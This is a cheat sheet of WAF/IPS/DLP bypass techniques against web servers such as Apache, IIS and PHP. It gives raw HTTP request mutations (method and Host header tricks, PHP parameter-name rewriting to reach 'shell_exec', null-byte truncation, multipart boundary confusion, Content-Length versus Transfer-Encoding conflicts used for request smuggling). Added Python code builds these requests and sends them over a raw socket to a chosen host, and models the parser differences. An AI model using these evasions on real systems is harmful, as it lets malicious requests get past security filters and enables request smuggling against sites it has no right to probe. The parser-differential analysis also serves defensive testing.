# WAF/IPS/DLP bypass Cheat Sheet
Another way to bypass: each entry below is a request that a WAF, IPS or DLP device may parse differently from the backend web server or application (Apache, IIS, PHP), so that the request which is inspected is not the request which is processed. `favoritewaf.com` is a placeholder host, and `==` separates two forms that the backend treats identically.

**Add \r\n before the first line of the HTTP request**

```

GET /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```


**Writing the method in lowercase (Apache)**
```
get /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```

**Tab before the method (IIS)**
```
	GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```

**GET /login?shell_exec HTTP/1.1**

PHP converts `.`, space and an unclosed `[` in a parameter name to `_` when it builds `$_GET`, so each of these requests reaches the application as `shell_exec` (`%2e` = `.`, `%5b` = `[`, `%5f` = `_`, `%20` = space):
```
GET /login?shell.exec HTTP/1.1
GET /login?shell[exec HTTP/1.1
GET /login?shell%5bexec HTTP/1.1
GET /login?shell%2eexec HTTP/1.1
GET /login?shell%5fexec HTTP/1.1
GET /login?shell%20exec HTTP/1.1
```

**GET /login.php?pam_param=test3**

The same normalisation collapses all three names to `pam_param`, and the last value wins:
```
GET /login.php?pam_param=test1&pam[param=test2&pam%5bparam=test3
```

**GET /login.php?hello=world HTTP/1.1**

The parameter name is cut at the null byte (`%00`), so the application sees `hello`:
```
GET /login.php?hello%00another_text=world HTTP/1.1
```

**HTTP Request - absoluteURI**

The request target is an absolute URI whose host (`localhost`) differs from the Host header:
```
GET http://localhost/login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```

**Double Host header**
```
GET /login.php HTTP/1.1
Host: favoritewaf.com
Host: localhost
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```

**Host in lowercase**
```
GET /login.php HTTP/1.1
host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```

**Host without space**
```
GET /login.php HTTP/1.1
Host:favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```
**Host with tab**
```
GET /login.php HTTP/1.1
Host:	favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```
**Host with additional symbols**

Characters that can be appended to the host value:
```
/
:
\x00
\x20
\x09
\xad (IIS)
```

Example:
```
GET /login.php HTTP/1.1
Host: favoritewaf.com:12345
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```

```
GET /login.php HTTP/1.1
Host: favoritewaf.com ignored.text
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```

**Content-Type with extra text**
```
POST /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Type: application/another-text/+++x-www-form-urlencoded

hello=world
```

**HTTP request with incorrect Content-Length (more data than specified)**

By Content-Length only the first byte is the body; the remaining `AAAAAAA` stays on the connection:
```
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Length: 1

AAAAAAAA
```

**Double Content-Type**
```
Content-Type: multipart/form-data; boundary=ZZZ
Content-Type: multipart/form-data; boundary=AAA
```

**Content-Disposition mutation**
```
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=--------1218108630

----------1218108630
Content-Disposition: form-data; name="hello"

world
----------1218108630--
```

```
Content-Disposition: form-data; name="hello"
Content-Disposition: form-data; name="hello
Content-Disposition: form-data; name="hello"world"
Content-Disposition: attachment; name="hello"
```


```
Content-Type: multipart/form-data; boundary=x


--x
Content-Disposition:
test1;
--x
test2;
--x--
test3;
name="hello"

world
```
**Boundary mutation**
**PHP**

PHP takes the boundary from the first occurrence of the string `boundary` in the Content-Type header (even inside another parameter name), reads what follows the next `=` and stops at `;` or `,`, so the first header is parsed like the second:
```
Content-Type: multipart/form-data; myfavoriteboundaryis=X; boundary=Hello;
==
Content-Type: multipart/form-data; boundary=X;
```


**Nullbyte**

The header is handled as a C string, so the boundary ends at the null byte:
```
Content-Type: multipart/form-data; boundary=HELLO\x00XXXXXXXXX
==
Content-Type: multipart/form-data; boundary=HELLO
```

**Ignored Content-Length**

When `Transfer-Encoding: chunked` is present it takes precedence over `Content-Length` (RFC 7230, section 3.3.3); chunk sizes are hexadecimal, so `0B` is 11 bytes. A device that frames the body by `Content-Length` instead sees a different body, which is the CL.TE discrepancy behind request smuggling:
```
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

hello=world
```

==
```
Content-Length: 22
Transfer-Encoding: chunked

0B
hello=world
0

```

==
```
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Transfer-Encoding: chunked

3
hel
3
lo=
3
wor
2
ld
0
```
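The request-line and Host mutations at the top of the sheet cannot be produced with an ordinary HTTP client library, which upper-cases the method, strips a leading CRLF and merges duplicate headers; they have to be written to a raw socket. The following is an added example, not code from the cheat sheet: `build_request()` assembles a request byte-for-byte from complete header lines, `MUTATIONS` holds the sheet's request-line and Host variants, and `send_raw()` (an assumed helper, not a library API) writes them to a host of your choosing. `favoritewaf.com` is the sheet's placeholder and is never contacted unless `send_raw()` is called.

```python
import socket
import ssl

# Placeholder host and User-Agent taken from the cheat sheet's examples.
UA = b"Mozilla/4.0 (compatible; MSIE5.01; Windows NT)"
BASE_HEADERS = [b"Host: favoritewaf.com", b"User-Agent: " + UA]


def build_request(method, target, header_lines, body=b"", prefix=b"", version=b"HTTP/1.1"):
    """Assemble a request byte-for-byte.

    header_lines are complete header lines as bytes, so duplicate headers,
    a missing space after the colon or a tab separator are sent untouched.
    prefix is emitted before the request line (a CRLF or a tab).
    """
    request_line = prefix + method + b" " + target + b" " + version
    return b"\r\n".join([request_line, *header_lines]) + b"\r\n\r\n" + body


# The request-line and Host mutations from the cheat sheet, built as raw bytes.
MUTATIONS = {
    "leading_crlf": build_request(b"GET", b"/login", BASE_HEADERS, prefix=b"\r\n"),
    "lowercase_method": build_request(b"get", b"/login", BASE_HEADERS),
    "tab_before_method": build_request(b"GET", b"/login.php", BASE_HEADERS, prefix=b"\t"),
    "absolute_uri": build_request(b"GET", b"http://localhost/login.php", BASE_HEADERS),
    "double_host": build_request(b"GET", b"/login.php",
                                 [b"Host: favoritewaf.com", b"Host: localhost", b"User-Agent: " + UA]),
    "host_lowercase": build_request(b"GET", b"/login.php", [b"host: favoritewaf.com", b"User-Agent: " + UA]),
    "host_no_space": build_request(b"GET", b"/login.php", [b"Host:favoritewaf.com", b"User-Agent: " + UA]),
    "host_tab": build_request(b"GET", b"/login.php", [b"Host:\tfavoritewaf.com", b"User-Agent: " + UA]),
    "host_port": build_request(b"GET", b"/login.php", [b"Host: favoritewaf.com:12345", b"User-Agent: " + UA]),
    "host_extra_text": build_request(b"GET", b"/login.php",
                                     [b"Host: favoritewaf.com ignored.text", b"User-Agent: " + UA]),
}


def send_raw(host, port, request, use_tls=False, timeout=5.0):
    """Write the request exactly as given and return whatever the server sends back.

    Reads until the server closes the connection or the socket times out
    (the cheat-sheet requests do not send Connection: close, so a keep-alive
    server only stops at the timeout).
    """
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    chunks = []
    with sock:
        sock.sendall(request)
        try:
            while True:
                data = sock.recv(65536)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


def status_line(response):
    """First line of a raw response (b"" if nothing came back)."""
    return response.split(b"\r\n", 1)[0]


if __name__ == "__main__":
    # Show the head of every mutated request; send one with e.g.
    # status_line(send_raw("127.0.0.1", 8080, MUTATIONS["double_host"]))
    for name, request in MUTATIONS.items():
        head = request.split(b"\r\n\r\n", 1)[0]
        print(name, head)
```

Compare `status_line()` of each mutation against the plain request: a difference between the reply through the WAF and the reply from the origin (or a block page for one form and a login page for another) is the parsing discrepancy the sheet is after.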
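The three parameter-name entries (`shell_exec`, `pam_param`, `hello%00another_text`) all rest on the application rewriting names after the WAF has inspected them. The following added example, not code from the cheat sheet, models PHP's rewrite of `$_GET` names (`.` and space to `_`, an unclosed `[` to `_`, truncation at a NUL byte) and compares it with a generic query parser that only percent-decodes; `hidden_names()` lists the names the application will use that never appear in the generic view. The generic side stands in for a signature-based WAF and is an assumption about such devices, not a description of any product.

```python
from urllib.parse import parse_qsl, unquote_to_bytes


def php_normalize_name(name):
    """Rewrite a decoded parameter name the way PHP does when it fills $_GET.

    Rules modelled here: the name ends at a NUL byte, leading spaces are
    dropped, '.' and ' ' become '_' up to the first '[', and an unclosed '['
    itself becomes '_' with the remainder kept verbatim.  A matched
    'name[key]' is left alone because PHP treats it as an array key.
    """
    name = name.split(b"\x00", 1)[0].lstrip(b" ")
    out = bytearray()
    for i, byte in enumerate(name):
        ch = bytes([byte])
        if ch in (b".", b" "):
            out += b"_"
        elif ch == b"[":
            rest = name[i:]
            out += rest if b"]" in rest else b"_" + rest[1:]
            break
        else:
            out += ch
    return bytes(out)


def php_view(query):
    """Build the parameter map as PHP would (duplicate names: the last value wins)."""
    params = {}
    for pair in query.split(b"&"):
        if not pair:
            continue
        raw_name, _, raw_value = pair.partition(b"=")
        key = php_normalize_name(unquote_to_bytes(raw_name.replace(b"+", b" ")))
        if key:
            params[key] = unquote_to_bytes(raw_value.replace(b"+", b" "))
    return params


def naive_view(query):
    """What a generic parser reports: names are percent-decoded but never rewritten.

    A signature-based inspector built on such a parser matches these names,
    not the ones the application will use.
    """
    view = {}
    for name, value in parse_qsl(query.decode("latin-1"), keep_blank_values=True):
        view.setdefault(name.encode("utf-8"), []).append(value.encode("utf-8"))
    return view


def hidden_names(query):
    """Names the application will see that never appear in the naive view."""
    return sorted(set(php_view(query)) - set(naive_view(query)))


# Query strings taken from the cheat sheet.
SAMPLES = [
    b"shell.exec=id",
    b"shell[exec=id",
    b"shell%5bexec=id",
    b"shell%2eexec=id",
    b"shell%20exec=id",
    b"pam_param=test1&pam[param=test2&pam%5bparam=test3",
    b"hello%00another_text=world",
]

if __name__ == "__main__":
    for query in SAMPLES:
        print(query, "->", php_view(query), "hidden from naive view:", hidden_names(query))
```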
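The PHP boundary and nullbyte entries are a parser differential on a single header. The following added example, not code from the cheat sheet or from PHP, reimplements the extraction rule of PHP's multipart reader (`main/rfc1867.c`: first `boundary` substring, then the next `=`, then up to `;` or `,`, on a C string that ends at NUL) as `php_boundary()`, puts a parameter-by-parameter reader beside it as `rfc_boundary()`, and uses a constructed multipart body to show that the two readers find different parts. The body and the part splitter are illustrative constructions.

```python
def php_boundary(content_type):
    """Boundary as PHP's multipart reader (main/rfc1867.c) extracts it, modelled here.

    The header is a C string, so it ends at the first NUL byte; the parser then
    looks for the first occurrence of the substring "boundary" (anywhere, even
    inside another parameter name), takes what follows the next "=", unwraps
    a quoted value, and otherwise stops at the first ";" or ",".
    """
    header = content_type.split(b"\x00", 1)[0]
    marker = header.find(b"boundary")
    if marker == -1:
        return None
    eq = header.find(b"=", marker)
    if eq == -1:
        return None
    value = header[eq + 1:]
    if value.startswith(b'"'):
        value = value[1:]
        end = value.find(b'"')
    else:
        stops = [k for k in (value.find(b";"), value.find(b",")) if k != -1]
        end = min(stops) if stops else -1
    if end != -1:
        value = value[:end]
    return value or None


def rfc_boundary(content_type):
    """Boundary as a parameter-by-parameter reader sees it (RFC 2045 style).

    Parameters are split on ";", only the one literally named "boundary"
    counts, and no byte inside the value is special.
    """
    _media_type, *params = content_type.split(b";")
    for param in params:
        name, _, value = param.strip().partition(b"=")
        if name.strip().lower() == b"boundary":
            value = value.strip()
            if len(value) >= 2 and value[:1] == b'"' and value[-1:] == b'"':
                value = value[1:-1]
            return value or None
    return None


def split_parts(body, boundary):
    """Raw parts found between "--boundary" delimiters ([] if the delimiter never occurs)."""
    if boundary is None:
        return []
    delimiter = b"--" + boundary
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):       # closing delimiter "--boundary--"
            break
        parts.append(chunk.strip(b"\r\n"))
    return parts


# Headers from the cheat sheet and a constructed body that uses boundary X.
PHP_HEADER = b"multipart/form-data; myfavoriteboundaryis=X; boundary=Hello;"
NUL_HEADER = b"multipart/form-data; boundary=HELLO\x00XXXXXXXXX"
BODY = (b"--X\r\n"
        b'Content-Disposition: form-data; name="hello"\r\n'
        b"\r\n"
        b"world\r\n"
        b"--X--\r\n")

if __name__ == "__main__":
    for header in (PHP_HEADER, NUL_HEADER):
        print(header, "php:", php_boundary(header), "rfc:", rfc_boundary(header))
    print("parts PHP would parse:", split_parts(BODY, php_boundary(PHP_HEADER)))
    print("parts a strict reader finds:", split_parts(BODY, rfc_boundary(PHP_HEADER)))
```

With `PHP_HEADER` the strict reader looks for `--Hello`, finds no part at all and has nothing to inspect, while the PHP-style reader finds the `hello=world` part delimited by `--X`.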
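The "Ignored Content-Length" and "incorrect Content-Length" entries come down to which header a parser uses to frame the body. The following added example, not code from the cheat sheet, implements both framings over the same raw bytes: `body_by_te()` follows RFC 7230 (chunked wins when both headers are present) and `body_by_cl()` trusts Content-Length alone. The sheet's three requests are embedded with a request line and Host header added so they parse stand-alone; the last-header-wins handling of repeated headers in `parse_head()` is a modelling choice, not a claim about any server.

```python
def parse_head(raw):
    """Split a raw request into (request line, headers, body bytes).

    Header names are lower-cased and a repeated header keeps its last value;
    that is only one of the possible behaviours (compare the double Host and
    double Content-Type entries) and is a modelling choice here.
    """
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest


def read_chunked(data):
    """Decode a chunked body; returns (decoded body, bytes left after the last chunk)."""
    body = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";", 1)[0].strip(), 16)  # hex size, extensions ignored
        pos = eol + 2
        if size == 0:
            # Last chunk: skip optional trailer lines up to the terminating blank line.
            while pos < len(data):
                eol = data.find(b"\r\n", pos)
                if eol == -1:
                    pos = len(data)
                    break
                line, pos = data[pos:eol], eol + 2
                if not line:
                    break
            return bytes(body), data[pos:]
        body += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


def body_by_te(raw):
    """Frame the body as RFC 7230 section 3.3.3 requires: chunked wins over Content-Length."""
    _, headers, rest = parse_head(raw)
    if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
        return read_chunked(rest)
    length = int(headers.get(b"content-length", b"0"))
    return rest[:length], rest[length:]


def body_by_cl(raw):
    """Frame the body by Content-Length alone, as a device that ignores chunking would."""
    _, headers, rest = parse_head(raw)
    length = int(headers.get(b"content-length", b"0"))
    return rest[:length], rest[length:]


# The cheat sheet's requests, with a request line and Host header added so they parse alone.
HEAD = b"POST /login.php HTTP/1.1\r\nHost: favoritewaf.com\r\n"
REQ_CL22_TE = (HEAD + b"Content-Length: 22\r\nTransfer-Encoding: chunked\r\n\r\n"
               b"0B\r\nhello=world\r\n0\r\n\r\n")
REQ_CL0_TE = (HEAD + b"Content-Type: application/x-www-form-urlencoded\r\n"
              b"Content-Length: 0\r\nTransfer-Encoding: chunked\r\n\r\n"
              b"3\r\nhel\r\n3\r\nlo=\r\n3\r\nwor\r\n2\r\nld\r\n0\r\n")
# The "incorrect Content-Length" request: one byte declared, eight sent.
REQ_SHORT_CL = HEAD + b"Content-Length: 1\r\n\r\nAAAAAAAA"

if __name__ == "__main__":
    for name, req in (("CL:22 + TE", REQ_CL22_TE), ("CL:0 + TE", REQ_CL0_TE), ("CL:1", REQ_SHORT_CL)):
        print(name, "TE view:", body_by_te(req), "CL view:", body_by_cl(req))
```

Note that the sheet's `Content-Length: 22` is exactly the length of the chunked framing (`0B\r\nhello=world\r\n0\r\n\r\n`), so a Content-Length device sees a body that contains no `hello=world` token, and with `Content-Length: 0` it sees an empty body and leaves the whole chunked payload on the connection as the start of the next request.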